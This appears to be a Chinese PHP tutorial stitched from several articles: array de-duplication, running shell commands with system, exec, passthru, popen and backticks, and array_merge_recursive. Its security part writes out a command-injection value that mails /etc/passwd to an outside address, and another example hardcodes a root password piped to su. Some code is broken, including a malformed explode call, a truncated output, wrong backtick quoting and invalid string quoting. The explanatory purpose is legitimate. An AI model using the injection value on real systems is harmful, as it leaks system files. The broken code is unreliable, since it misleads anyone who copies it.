首先,来看一维数组重复项的去除方法。
使用array_unique函数,例如:
<?php $aa=array("apple","banana","pear","apple","wail","watermalon"); $bb=array_unique($aa); print_r($bb); //by www. ?>
输出结果:
Array ( [0] => apple [1] => banana [2] => pear [4] => wail [5] => watermalon ) 。
再来看下二维数组重复项的去除方法。
对于二维数组,要分两种情况讨论:
一种是因为某一键名的值不能重复,删除重复项;
另一种因为内部的一维数组不能完全相同,而删除重复项。
通过具体的例子加以说明。
1,因为某一键名的值不能重复,删除重复项。
<?php function assoc_unique($arr, $key) { $tmp_arr = array(); foreach($arr as $k => $v) { if(in_array($v[$key], $tmp_arr))//搜索$v[$key]是否在$tmp_arr数组中存在,若存在返回true { unset($arr[$k]); } else { $tmp_arr[] = $v[$key]; } } sort($arr); //sort函数对数组进行排序 return $arr; } $aa = array( array('id' => 123, 'name' => '张三'), array('id' => 123, 'name' => '李四'), array('id' => 124, 'name' => '王五'), array('id' => 125, 'name' => '赵六'), array('id' => 126, 'name' => '赵六') ); $key = 'id'; assoc_unique(&$aa, $key); print_r($aa); //by www. ?>
输出结果:
Array ( [0] => Array ( [id] => 123 [name] => 张三 ) [1] => Array ( [id] => 124 [name] => 王五 ) [2] => Array ( [id] => 125 [name] => 赵六 ) [3] =>
Array ( [id] => 126 [name] => 赵六 ) )
2,因内部的一维数组不能完全相同,而删除重复项
<?php function array_unique_fb($array2D){ foreach ($array2D as $v){ $v = join(",",$v); //降维,也可以用implode,将一维数组转换为用逗号连接的字符串 $temp[] = $v; } $temp = array_unique($temp); //去掉重复的字符串,也就是重复的一维数组 foreach ($temp as $k => $v){ $temp[$k] = explode()(",",$v); //再将拆开的数组重新组装 } return $temp; } $aa = array( array('id' => 123, 'name' => '张三'), array('id' => 123, 'name' => '李四'), array('id' => 124, 'name' => '王五'), array('id' => 123, 'name' => '李四'), array('id' => 126, 'name' => '赵六') ); $bb=array_unique_fb($aa); print_r($bb); //by www. ?>
输出结果:
=> 126 [1] => 赵六 ) )
在php编程中,用于执行系统外部命令的方法有很多,这里看下它们的区别:
system() 输出并返回最后一行shell结果。
exec() 不输出结果,返回最后一行shell结果,所有结果可以保存到一个返回的数组里面。
passthru() 只调用命令,把命令的运行结果原样地直接输出到标准输出设备上。
相同点:都可以获得命令执行的状态码。
例如:
// exec ('dir');
// passthru ('dir');
// echo `dir`;
PHP和其它的程序设计语言一样,完全可以在程序内调用外部命令,并且是很简单的:只要用一个或几个函数即可。
前提条件
由于PHP基本是用于WEB程序开发的,所以安全性成了人们考虑的一个重要方面。
于是PHP的设计者们给PHP加了一个门:安全模式。
如果运行在安全模式下,那么PHP脚本中将受到如下四个方面的限制:
2、在打开文件时有些限制
3、连接MySQL数据库
4、基于HTTP的认证
在 安全模式下,只有在特定目录中的外部程序才可以被执行,对其它程序的调用将被拒绝。
这个目录可以在php.ini文件中用 safe_mode_exec_dir指令,或在编译PHP是加上
--with-exec-dir选项来指定,默认是 /usr/local/php/bin。
如果你调用一个应该可以输出结果的外部命令(意思是PHP脚本没有错误),得到的却是一片空白,那么很可能PHP运行在安全模式下。
在PHP中调用外部命令,可以用如下三种方法来实现:
1) 用PHP提供的专门函数
PHP提供共了3个专门的执行外部命令的函数:system(),exec(),passthru()。
1、system()
原型:string system (string command [, int return_var])
system()函数很其它语言中的差不多,它执行给定的命令,输出和返回结果。第二个参数是可选的,用来得到命令执行后的状态码。
例子:
<?php system("/usr/local/bin/webalizer/webalizer"); ?>
2、exec()
原型:string exec (string command [, string array [, int return_var]])
exec ()函数与system()类似,也执行给定的命令,但不输出结果,而是返回结果的最后一行。虽然它只返回命令结果的最后一行,但用第二个参数array 可以得到完整的结
果,方法是把结
果逐行追加到array的结尾处。所以如果array不是空的,在调用之前最好用unset()最它清掉。只有指定了第二 个参数时,才可以用第三个参数,用来取得命令执行的状态码
。
例子:
<?php exec("/bin/ls -l"); exec("/bin/ls -l", $res); exec("/bin/ls -l", $res, $rc); ?>
3、passthru()
原型:void passthru (string command [, int return_var])
passthru ()只调用命令,不返回任何结果,但把命令的运行结果原样地直接输出到标准输出设备上。所以passthru()函数经常用来调用象pbmplus (Unix下的一个处理图片
的工具,输出二
进制的原始图片的流)这样的程序。同样它也可以得到命令执行的状态码。
例子:
<?php header("Content-type: image/gif"); passthru("./ppmtogif hunte.ppm"); ?>
2)、用popen()函数打开进程
上面的方法只能简单地执行命令,却不能与命令交互。
有时须向命令输入一些东西,如在增加Linux的系统用户时,要调用su来把当前用户换到root才行,而su命令必须要在命令行
上输入root的密码。这种情况下,用上面提到的方法显然是不行的。
popen ()函数打开一个进程管道来执行给定的命令,返回一个文件句柄。既然返回的是一个文件句柄,那么就可以对它读和写了。在PHP3中,对这种句柄只能做单一 的操作
模式,要么写,要么读;从PHP4开始,可以同时读和写了。
除非这个句柄是以一种模式(读或写)打开的,否则必须调用pclose()函数来关闭 它。
例子1:
<?php $fp=popen("/bin/ls -l", "r"); ?>
例子2:
<?php $sucommand = "su --login root --command"; $useradd = "useradd "; $rootpasswd = "verygood"; $user = "james"; $user_add = sprintf("%s "%s %s"",$sucommand,$useradd,$user); $fp = @popen($user_add,"w"); @fputs($fp,$rootpasswd); @pclose($fp); ?>
3)、用反撇号(`,也就是键盘上ESC键下面的那个,和~在同一个上面)
这个方法以前没有归入PHP的文档,是作为一个秘技存在的。
用两个反撇号把要执行的命令括起来作为一个表达式,这个表达式的值就是命令执行的结果。
例如:
<?php $res='/bin/ls -l'; echo ' '.$res.' '; ?>
输出结果:
hunte.ppm
jpg.htm
jpg.jpg
passthru.php
需要考虑两个问题:安全性和超时。
安全性。
比如,有一家小型的网上商店,所以可以出售的产品列表放在一个文件中。
编写一个有表单的HTML文件,让你的用户输入他们的EMAIL地 址,然后把这个产品列表发给他们。
假设没有使用PHP的mail()函数(或从未听说过),就调用Linux/Unix系统的mail程序来发送此文件。
例如:
<?php system("mail $to < products.txt"); echo "产品目录已经发送到你的信箱:$to"; ?>
此代码实际上存在着非常大的安全漏洞。
如果有个恶意的用户输入了这样一个EMAIL地址:
'--bla ; mail someone@domain.com < /etc/passwd ;'
则这条命令最终变成:
'mail --bla ; mail someone@domain.com < /etc/passwd ; < products.txt'
很恐怖吧,千万不要在自己的电脑上试,否则后果不是你想像的恶劣。
php提供了两个函数:EscapeShellCmd()和EscapeShellArg()。
函数EscapeShellCmd把一个字符串 中所有可能瞒过Shell而去执行另外一个命令的字符转义。这些字符在Shell
中是有特殊含义的,象分号(),重定向(>)和从文件读入 (<)等。
函数EscapeShellArg是用来处理命令的参数的。它在给定的字符串两边加上单引号,并把字符串中的单引号转义,这样这个字符串 就可以安全地作为命令的参数。
再说下超时问题。
如果要执行的命令要花费很长的时间,那么应该把这个命令放到系统的后台去运行。
默认情况下,象system()等函数要等到这个命令运行完才返回(实际上是要等命令的输出结果),这肯定会引起PHP脚本的超时。
解决方法,把命令的输出重定向到另外一个文件或流中。
例如:
<?php system("/usr/local/bin/order_proc > /tmp/null &"); ?>
array_merge()函数与array_merge_recursive()相同,可以将两个或多个数组合并在一起,形成一个联合的数组。
二者的区别在于:
当某个输入数组中的某个键己经存在于结果数组中时该函数会采取不同的处理方式。
array_merge()会覆盖前面存在的键/值对,替换为当前输入数组中的键/值对,而array_merge_recursive()将把两个值合并在一起,形成一个新的数组,并以原有的键作为数组名。
还有一个数组合并的形式,就是递归追加数组。
其形式为:
array array_merge_recursive(array array1,array array2[…,array arrayN])
例子:
<?php //追加数组 //by www. $fruit1 = array("apple" => "red", "banana" => "yellow"); $fruit2 = array("pear" => "yellow", "apple" => "green"); $result = array_merge_recursive($fruit1, $fruit2); print_r($result); // output // Array ( [apple] => Array ( [0] => red [1] => green ) [banana] => yellow [pear] => yellow ) ?>
现在键 apple 指向一个数组,这个数组由两个颜色值组成的索引数组。